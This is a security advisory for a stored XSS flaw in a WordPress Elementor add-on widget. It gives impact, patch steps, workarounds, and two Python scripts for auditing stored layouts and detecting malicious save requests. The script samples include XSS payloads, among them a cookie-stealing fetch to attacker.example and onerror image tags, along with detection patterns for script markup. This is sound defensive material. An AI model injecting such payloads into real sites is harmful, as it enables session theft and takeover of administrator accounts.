CVE-2024-13155
📋 TL;DR
The Unlimited Elements For Elementor WordPress plugin has a stored cross-site scripting (XSS) vulnerability in its Transparent Split Hero widget: user-supplied widget attributes are not sufficiently sanitized on input or escaped on output. Authenticated attackers with contributor-level access or higher can inject a script that runs in the browser of anyone who views the affected page. All versions up to and including 1.5.140 are affected.
💻 Affected Systems
- Unlimited Elements For Elementor WordPress plugin
📦 What is this software?
Unlimited Elements For Elementor by Unlimited Elements: an add-on that extends the Elementor page builder with a library of installable widgets, Transparent Split Hero among them. A widget's attributes are stored with the page's Elementor layout and rendered to every visitor, which is what turns an unsanitized attribute into stored XSS.
⚠️ Risk & Real-World Impact
Worst Case
An administrator who views the affected page runs the injected script with their own session. From there the script can create a new administrator account, upload a backdoored plugin for persistent access, deface the site, or redirect visitors to malicious sites.
Likely Case
Attackers holding contributor accounts inject a script that steals visitors' session cookies or displays phishing content. Contributors cannot publish, but a payload sitting in a draft can still fire when an editor or administrator previews or reviews it.
If Mitigated
With contributor accounts restricted to trusted users and a Content Security Policy that forbids inline scripts and event handlers, a successful injection degrades to defacement of the affected page rather than script execution in viewers' browsers.
🎯 Exploit Status
Exploitation requires an authenticated WordPress account with at least the contributor role. Once authenticated it is straightforward: the payload is ordinary HTML placed in one of the widget's text attributes through the page editor, and no special tooling is needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after 1.5.140
Vendor Advisory: https://unlimited-elements.com/change-log/
Restart Required: No
Instructions:
1. Update the plugin to a version later than 1.5.140.
2. Delete the Transparent Split Hero widget from the plugin's widget library.
3. Reinstall the Transparent Split Hero widget from the plugin interface.
The delete-and-reinstall steps matter: the vendor's instructions replace the already-installed copy of the widget with the patched widget definition, so updating the plugin files alone is not enough. Re-check any page that used the widget after reinstalling it.
🔧 Temporary Workarounds
Remove vulnerable widget
All versions: delete the Transparent Split Hero widget to eliminate the attack vector.
In wp-admin, open the plugin's widget library (Unlimited Elements > Widgets), find Transparent Split Hero and delete it; then remove the widget from any page or template that still uses it, since an already-injected payload lives in the saved page layout, not in the widget definition.
Restrict user roles
All versions: limit contributor-level access (and every higher role) to trusted users only.
Review Users in wp-admin, remove or demote unneeded contributor, author and editor accounts, and use a role-management plugin or custom capabilities to keep untrusted users below contributor.
🧯 If You Can't Patch
- Remove the Transparent Split Hero widget from all pages and templates, and delete it from the plugin's widget library so it cannot be re-added
- Send a Content Security Policy header that disallows inline scripts and event handlers (no 'unsafe-inline' for script-src); test in report-only mode first, because Elementor and many themes rely on inline scripts and a strict policy can break the site
- Audit contributor and author accounts and the content they have saved for the widget
🔍 How to Verify
Check if Vulnerable:
In wp-admin, open Plugins and read the Unlimited Elements For Elementor version. If it is 1.5.140 or lower and the Transparent Split Hero widget is installed, the site is vulnerable. A site that has never installed the widget is not exposed to this particular flaw, but should still update.
Check Version:
wp plugin get unlimited-elements-for-elementor --field=version
Verify Fix Applied:
After updating and reinstalling the widget, confirm the reported version is above 1.5.140. Then, with a contributor-level test account, put a marker such as <script>alert(1)</script> or an onerror attribute into the widget's text attributes, save, and view and preview the page as an administrator: the markup must be stripped or rendered as literal text, never executed.
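The version check and the content audit above, automated. The script below is an added example written for this page, not code from the plugin vendor. It compares an installed version against 1.5.140 and walks a page's Elementor layout (the JSON stored in the `_elementor_data` post meta, which `wp post meta get <post-id> _elementor_data` prints) looking for script markup in the Transparent Split Hero widget's stored settings, decoding percent- and entity-encoded values first so disguised payloads still match. The widget's internal `widgetType` string is not given on this page, so `ucaddon_transparent_split_hero` is a placeholder to replace with the real one (or pass `widget_type=None` to scan every widget); the sample layout and the attacker domain are constructed.

```python
import json
import re
from html import unescape
from urllib.parse import unquote

# Last affected release named on this page.
LAST_VULNERABLE = (1, 5, 140)

# ASSUMPTION: the internal widgetType string of the Transparent Split Hero
# widget is not given on this page; this placeholder stands in for it.
SUSPECT_WIDGET_TYPE = "ucaddon_transparent_split_hero"

# Markers of script execution inside a text attribute. Deliberately broad:
# a token such as "onboarding=" would also match, so hits are leads for
# manual review, not proof of compromise.
SCRIPT_PATTERNS = re.compile(
    r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:iframe|object|embed|svg)\b",
    re.IGNORECASE,
)


def parse_version(version):
    """'1.5.140' -> (1, 5, 140); tolerates suffixes such as '1.5.140-beta'."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def is_vulnerable_version(version):
    """True when the installed plugin is 1.5.140 or older."""
    return parse_version(version) <= LAST_VULNERABLE


def normalize(text):
    """Undo percent- and HTML-entity encoding so disguised payloads still match."""
    return unescape(unquote(text))


def iter_widgets(elements):
    """Depth-first walk of the Elementor element tree, yielding widget nodes."""
    for element in elements:
        if element.get("elType") == "widget":
            yield element
        yield from iter_widgets(element.get("elements", []))


def find_script_settings(value, path=""):
    """Return dotted paths of string settings that contain script markers."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            hits += find_script_settings(child, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for index, child in enumerate(value):
            hits += find_script_settings(child, f"{path}[{index}]")
    elif isinstance(value, str) and SCRIPT_PATTERNS.search(normalize(value)):
        hits.append(path)
    return hits


def scan_elementor_data(raw_json, widget_type=SUSPECT_WIDGET_TYPE):
    """Return (widget id, setting path) pairs whose setting carries script markers.

    widget_type=None scans every widget on the page instead of a single type.
    """
    findings = []
    for widget in iter_widgets(json.loads(raw_json)):
        if widget_type is not None and widget.get("widgetType") != widget_type:
            continue
        for path in find_script_settings(widget.get("settings", {})):
            findings.append((widget["id"], path))
    return findings


# Constructed sample in the shape of an _elementor_data value (section > column
# > widgets). Setting keys and the attacker domain are made up for the example.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "s1", "elType": "section", "elements": [
        {"id": "c1", "elType": "column", "elements": [
            {"id": "w1", "elType": "widget", "widgetType": SUSPECT_WIDGET_TYPE,
             "settings": {"title": "Welcome", "subtitle": "Plain text only"}},
            {"id": "w2", "elType": "widget", "widgetType": SUSPECT_WIDGET_TYPE,
             "settings": {
                 "title": "Hello<img src=x onerror=alert(document.cookie)>",
                 "subtitle": "%3Cscript%3Efetch('//attacker.example/?c='+document.cookie)%3C/script%3E",
             }},
            {"id": "w3", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "<script>alert(1)</script>"}},
        ]},
    ]},
])


if __name__ == "__main__":
    for version in ("1.5.99", "1.5.140", "1.5.141"):
        print(version, "vulnerable" if is_vulnerable_version(version) else "patched")
    for widget_id, path in scan_elementor_data(SAMPLE_ELEMENTOR_DATA):
        print(f"widget {widget_id}: suspicious setting {path}")
```

Run it against real data with `wp post list --post_type=page --field=ID` to enumerate pages and `wp post meta get <id> _elementor_data` for each; a hit in a page last edited by a contributor or author is the strongest signal, because those roles cannot legitimately save script markup.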
📡 Detection & Monitoring
Log Indicators:
- POST requests from contributor or author accounts to the Elementor save endpoints (admin-ajax.php and the REST API) whose parameters contain script tags, javascript: URLs or on*= event-handler attributes, including URL-encoded forms
- Script tags or event-handler attributes in the widget's stored settings (the _elementor_data post meta of the affected pages)
Network Indicators:
- Page loads that fetch scripts from external domains the site does not use, originating from widget content that should contain only text
- Outbound requests carrying cookie or session values in query strings, the typical exfiltration pattern of a cookie-stealing payload
SIEM Query:
source="wordpress" AND method="POST" AND (uri_path="/wp-admin/admin-ajax.php" OR uri_path="/wp-json/*") AND user_role IN ("contributor", "author") AND (params CONTAINS "<script" OR params CONTAINS "%3Cscript" OR params CONTAINS "javascript:" OR params CONTAINS "onerror=")
The user_role and params fields must come from a WordPress audit-logging plugin or a WAF: a plain web-server access log carries neither the user's role nor the POST body. A payload that is URL-encoded or entity-encoded will not match a literal "<script", so decode the parameters before matching where the SIEM allows it.
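The query above as runnable detection logic, added here as an example rather than taken from the page or any vendor tooling. It consumes JSON audit events (the field names, the `action=elementor_ajax` parameter layout, and the attacker domain are assumptions for the sample), repeatedly strips percent, plus and HTML-entity encoding, and only alerts on POSTs to the save endpoints from roles that lack the unfiltered_html capability on a single-site install, so an administrator legitimately saving a script does not trip it while a double-encoded payload from a contributor does.

```python
import json
import re
from html import unescape
from urllib.parse import unquote_plus

SCRIPT_PATTERNS = re.compile(r"<\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)

# Roles without the unfiltered_html capability on a single-site install:
# script markup submitted by them has no legitimate reason to exist.
LOW_PRIV_ROLES = {"contributor", "author"}

# Endpoints through which the Elementor editor and the REST API save content.
SAVE_ENDPOINTS = ("/wp-admin/admin-ajax.php", "/wp-json/")


def decode_layers(text, max_rounds=3):
    """Strip up to max_rounds of percent/plus and HTML-entity encoding."""
    for _ in range(max_rounds):
        decoded = unescape(unquote_plus(text))
        if decoded == text:
            break
        text = decoded
    return text


def is_suspicious(event):
    """Low-privilege POST to a save endpoint whose decoded params carry script markup."""
    if event.get("method") != "POST":
        return False
    if not event.get("uri_path", "").startswith(SAVE_ENDPOINTS):
        return False
    if event.get("role") not in LOW_PRIV_ROLES:
        return False
    return SCRIPT_PATTERNS.search(decode_layers(event.get("params", ""))) is not None


def scan_events(json_lines):
    """Return (timestamp, user, uri_path) for every suspicious event."""
    alerts = []
    for line in json_lines:
        event = json.loads(line)
        if is_suspicious(event):
            alerts.append((event["ts"], event["user"], event["uri_path"]))
    return alerts


# Constructed audit events. Field names and the parameter layout are
# assumptions about what an audit-log plugin emits; the domain is made up.
SAMPLE_EVENTS = [
    # Administrator saving a script: has unfiltered_html, not alerted.
    json.dumps({"ts": "2025-01-10T09:00:01Z", "user": "alice", "role": "administrator",
                "method": "POST", "uri_path": "/wp-admin/admin-ajax.php",
                "params": "action=elementor_ajax&actions=%7B%22title%22%3A%22%3Cscript%3E%22%7D"}),
    # Contributor with a double-URL-encoded payload: "<script" never appears literally.
    json.dumps({"ts": "2025-01-10T09:00:02Z", "user": "bob", "role": "contributor",
                "method": "POST", "uri_path": "/wp-admin/admin-ajax.php",
                "params": "action=elementor_ajax&actions=%257B%2522title%2522%253A%2522"
                          "%253Cscript%2520src%253D%252F%252Fattacker.example%252Fx.js%253E%2522%257D"}),
    # Contributor editing ordinary text over REST: not alerted.
    json.dumps({"ts": "2025-01-10T09:00:03Z", "user": "bob", "role": "contributor",
                "method": "POST", "uri_path": "/wp-json/wp/v2/posts/12",
                "params": "title=Quarterly+update"}),
    # Contributor merely opening the editor: GET, not alerted.
    json.dumps({"ts": "2025-01-10T09:00:04Z", "user": "carol", "role": "contributor",
                "method": "GET", "uri_path": "/wp-admin/post.php",
                "params": "post=12&action=edit"}),
    # Author smuggling an event-handler attribute instead of a <script> tag.
    json.dumps({"ts": "2025-01-10T09:00:05Z", "user": "dave", "role": "author",
                "method": "POST", "uri_path": "/wp-admin/admin-ajax.php",
                "params": "action=elementor_ajax&actions=%7B%22title%22%3A%22Hi%3Cimg+src%3Dx+onerror%3Dalert(1)%3E%22%7D"}),
]


if __name__ == "__main__":
    for ts, user, path in scan_events(SAMPLE_EVENTS):
        print(f"{ts} ALERT user={user} path={path}")
```

The role filter is what keeps the alert volume usable: editors and administrators save inline scripts legitimately, so matching on the payload alone produces noise, whereas a contributor or author submitting one is worth a ticket every time.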